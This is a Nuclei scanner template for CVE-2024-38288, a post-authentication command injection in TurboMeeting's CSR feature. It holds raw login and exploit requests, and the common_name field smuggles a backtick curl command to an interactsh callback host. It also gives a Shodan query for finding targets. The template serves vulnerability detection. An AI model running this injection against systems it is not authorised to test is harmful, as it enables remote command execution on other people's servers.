daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2024/CVE-2024-38288.yaml

74 lines
2.3 KiB
YAML
Raw Blame History

id: CVE-2024-38288
info:
name: TurboMeeting - Post-Authentication Command Injection
author: rootxharsh,iamnoooob,pdresearch
severity: high
description: |
The Certificate Signing Request (CSR) feature in the admin portal of the application is vulnerable to command injection. This vulnerability could allow authenticated admin users to execute arbitrary commands on the underlying server by injecting malicious input into the CSR generation process. The application failed to properly sanitize user-supplied input before using it in a command executed privileges.
reference:
- https://github.com/google/security-research/security/advisories/GHSA-gx6g-8mvx-3q5c
- https://www.rhubcom.com/v5/manuals.html
classification:
epss-score: 0.00043
epss-percentile: 0.09357
metadata:
verified: true
max-request: 2
shodan-query: html:"TurboMeeting"
tags: cve,cve2024,rce,turbomeeting,authenticated
variables:
username: "{{username}}"
password: "{{password}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /as/wapi/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
next_path=%2Fas%2Fwapi%2Fprofile_entry&Email={{username}}&Password={{password}}&submit=Login
matchers:
- type: word
part: body
words:
- "as/wapi/profile_entry?sid="
internal: true
extractors:
- type: regex
name: sid
part: body
group: 1
regex:
- 'sid=(.*?)"'
internal: true
- raw:
- |
@timeout: 20s
POST /as/wapi/generate_csr HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
sid={{sid}}&common_name=1"%20out%20/dev/null"`curl%20{{interactsh-url}}`&company_name=1&state=1&city=1&country=US&submit=Generate+CSR
matchers-condition: and
matchers:
- type: word
part: body
words:
- CSR
- SSL
condition: and
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "dns"
# digest: 490a004630440220203de4258c77f0b3f46006707f45d197100eab841ddda3976bf550870b81c67d02205b75ab453b0008ab9bcc928e6784877017f3814bbaa8e6cf840548b94623316b:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink